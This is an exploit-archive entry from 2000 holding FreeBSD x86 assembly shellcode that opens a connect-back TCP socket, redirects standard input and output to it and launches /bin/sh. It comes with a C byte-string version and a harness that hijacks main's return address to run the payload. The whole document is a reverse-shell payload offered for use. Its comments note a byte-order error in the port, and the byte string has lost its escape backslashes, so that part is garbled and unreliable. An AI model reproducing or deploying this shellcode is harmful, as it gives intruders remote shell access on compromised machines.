
# Title : BSD Passive Connection Shellcode
# Published : 2000-11-19
# Author : Scrippie
# Previous Title : execve of /bin/sh after setreuid(0,0)
# Next Title : linux chroot()/execve() code


; Passive Connection Shellcode
;
; Coded by Scrippie - ronald@grafix.nl - http://b0f.freebsd.lublin.pl
; Buffer0verfl0w Security
; Why? This evades firewalls...
;
; YES, this is for NASM, I detest AT&T syntax - it's gross and unreadable
;
; This is the FreeBSD variant I whipped up
;
; Tnx to dvorak for pointing out that BSD's int 80h assumes a stored EIP
; on the stack before making it and that BSD has a somewhat different
; sockaddr_in structure (containing sin_len)

        BITS 32

; Payload layout, addressed through esi once Start has popped the address
; that `call Start` (at EndCode) pushed - the usual jmp/call/pop trick for
; locating the data bytes without knowing an absolute address:
;
;   esi+0   sockaddr_in_off   8 bytes: sin_len, sin_family, sin_port, sin_addr
;   esi+8   shell_off         '/bin/sh' (7 bytes; NUL is written at runtime)
;   esi+16  shell_ptr_off     argv array built at runtime: { &shell, NULL }
;
; Only the first 15 data bytes ship with the code (see the db/dd lines at
; the end); the NUL terminator and the argv array are written by the code
; itself, so the payload must be sitting in writable memory.
;
; FreeBSD int 80h convention used throughout: syscall number in eax,
; arguments pushed right-to-left, then one extra dword pushed last that
; stands in for the return address a libc stub would have left on the
; stack (the "skipped"/"canary"/"ruined" pushes below). Register roles:
;   esi = data base, edx = socket descriptor (live from socket() onward),
;   ebx/ecx = argument scratch, eax = syscall number / return value.

; Equates - keeps this stuff a lot more clear

PORT            equ 31337               ; What an eleet port!

_exit           equ 1                   ; See /usr/src/sys/kern/syscalls.c
execve          equ 59                  ; See /usr/src/sys/kern/syscalls.c
dup2            equ 90                  ; See /usr/src/sys/kern/syscalls.c
socket          equ 97                  ; See /usr/src/sys/kern/syscalls.c
connect         equ 98                  ; See /usr/src/sys/kern/syscalls.c

IPPROTO_TCP     equ 6                   ; See netinet/in.h
PF_INET         equ 2                   ; See sys/socket.h
SOCK_STREAM     equ 1                   ; See sys/socket.h

sockaddr_in_off equ 0                   ; byte offsets from esi, see layout above
shell_off       equ 8
shell_ptr_off   equ 16

        jmp short EndCode               ; forward to the call that yields our address

Start:
        pop esi                         ; Get offset data in esi (return addr pushed by call Start)

        xor eax, eax                    ; eax/ebx cleared so the byte moves below
        xor ebx, ebx                    ; yield full 32-bit values (no NUL bytes needed)

        mov bl, IPPROTO_TCP             ; Push IPPROTO_TCP
        push ebx
        mov bl, SOCK_STREAM             ; Push SOCK_STREAM
        push ebx
        mov bl, PF_INET                 ; Push PF_INET
        push ebx
        push ebx                        ; Skipped by int 80h (return-address slot, value irrelevant)
        mov al, socket                  ; Select socket() syscall

        int 80h                         ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
        mov edx, eax                    ; Save the resulting socket descriptor (edx stays live until execve)

        ; Patch the sockaddr_in in place: sin_len (offset 0) is left as the
        ; 'A' byte from the data block; sin_family and sin_port are written here.
        mov byte [esi+sockaddr_in_off+1], PF_INET ; sin_family -> PF_INET
        ; NOTE(review): this stores PORT as a little-endian word (bytes 69 7a
        ; in the dump below) while sin_port is read in network byte order,
        ; so the port on the wire is not 31337 as the equate suggests.
        mov word [esi+sockaddr_in_off+2], PORT  ; Set the port number

        mov bl, 16                      ; sizeof(sockaddr_in) - namelen argument (bl was PF_INET, upper bytes still 0)
        push ebx

        lea ebx, [esi+sockaddr_in_off]  ; Get offset sockaddr_in into ebx
        push ebx                        ; Push it
        push eax                        ; Still holds sockfd
        push eax                        ; Canary value (return-address slot)

        mov al, connect                 ; Select connect() syscall (eax upper bytes are 0: it held the small sockfd)
        int 80h                         ; connect(sockfd, &sockaddr_in, 16)

        ; dup2(sockfd, fd) for fd = 0, 1, 2 so the shell's stdio is the socket.
        ; FreeBSD dup2 takes (from, to); edx is pushed last, so it is arg 1.
        xor ebx, ebx                    ; ebx = 0 (stdin)
        push ebx
        push edx
        mov al, dup2                    ; Select dup2 syscall

        push eax                        ; Ruined (return-address slot, value irrelevant)
        int 80h

        inc bl                          ; ebx = 1
        push ebx
        push edx
        mov al, dup2                    ; Do the same for stdout
        
        push eax
        int 80h

        inc bl                          ; ebx = 2
        push ebx
        push edx
        mov al, dup2                    ; And finally for stderr

        push eax
        int 80h

        xor ebx, ebx
        push ebx                        ; *envp == NULL

        ; Zero 9 bytes starting at esi+15: the NUL terminator of '/bin/sh'
        ; plus the 8-byte argv array at shell_ptr_off. These bytes lie past
        ; the 15 data bytes that ship with the payload, so they are written
        ; into whatever memory follows it.
        lea edi, [esi+shell_off+7]
        xor eax, eax
        xor ecx, ecx
        mov cl, 9
        repe stosb

        lea ebx, [esi+shell_off]        ; Get offset shell into ebx
        mov [esi+shell_ptr_off], ebx    ; Store it at shell_ptr_off: argv[0] = &shell (argv[1] stays NULL from stosb)
        lea ecx, [esi+shell_ptr_off]    ; Get offset shell_ptr_off into ecx
        push ecx                        ; argp
        push ebx                        ; command

        push eax                        ; canary (return-address slot; eax is 0 after the stosb setup)
        mov al, execve
        int 80h                         ; execve("/bin/sh", argv, NULL) - Spawn the frikkin' shell

        mov al, _exit                   ; _exit() system call - only reached if execve failed
        int 80h                         ; Do it

EndCode:
        call Start                      ; pushes the address of sockaddr_in, popped into esi at Start

sockaddr_in     db 'ABCC'               ; A=sin_len - B=sin_family - C=port (B and CC are overwritten at runtime)
                dd 0x100007f            ; IP addr (s_addr) in htonl() form: bytes 7f 00 00 01 = 127.0.0.1
; remaining 8 bytes of the 16-byte sockaddr_in are not needed ;)

shell           db '/bin/sh' ;,0        ; terminating NUL is written at runtime by the stosb above
;shell_ptr      db 1,2,3,4              ; argv array is built at runtime at shell_ptr_off instead

------------------------------------------------------------------------------

And here is the equivalent shellcode as a C byte string

/*
 * Byte encoding of the NASM listing above (the bytes 41 42 43 43 7f 00 00 01
 * 2f 62 69 6e 2f 73 68 at the end are the 'ABCC', 127.0.0.1 and '/bin/sh'
 * data). The backslash of every \x escape has been lost in extraction, and
 * the string is broken across lines, so this does not compile as shown; the
 * "^ Start of IP addr" text after the closing quote is a page annotation
 * pointing at the 7f 00 00 01 bytes, not C.
 */
char shellcode[]=
"xebx68x5ex31xc0x31xdbxb3x06x53xb3x01x53xb3x02x53x53xb0x61x
cdx80x89xc2xc6x46x01x02x66xc7x46x02x69x7axb3x10x53x8dx1ex53
x50x50xb0x62xcdx80x31xdbx53x52xb0x5ax50xcdx80xfexc3x53x52xb0
x5ax50xcdx80xfexc3x53x52xb0x5ax50xcdx80x31xdbx53x8dx7ex0fx3
1xc0x31xc9xb1x09xf3xaax8dx5ex08x89x5ex10x8dx4ex10x51x53x50x
b0x3bxcdx80xb0x01xcdx80xe8x93xffxffxffx41x42x43x43x7fx00x00
x01x2fx62x69x6ex2fx73x68";				    ^
						             Start of IP addr
/*
 * Test harness: overwrites main's own saved return address with the
 * address of shellcode[], so returning from main jumps into the payload.
 * The "&ret + 2" arithmetic assumes a specific 32-bit frame layout (local,
 * saved EBP, return address) and a non-standard `void main`; whether it
 * lands on the return slot depends on the compiler and its options.
 */
void main() {
        int *ret;

        ret = (int *)&ret + 2;          /* assumed: two dwords above the local is the saved EIP */
        (*ret) = (int)shellcode;        /* redirect the return to the payload bytes */
}


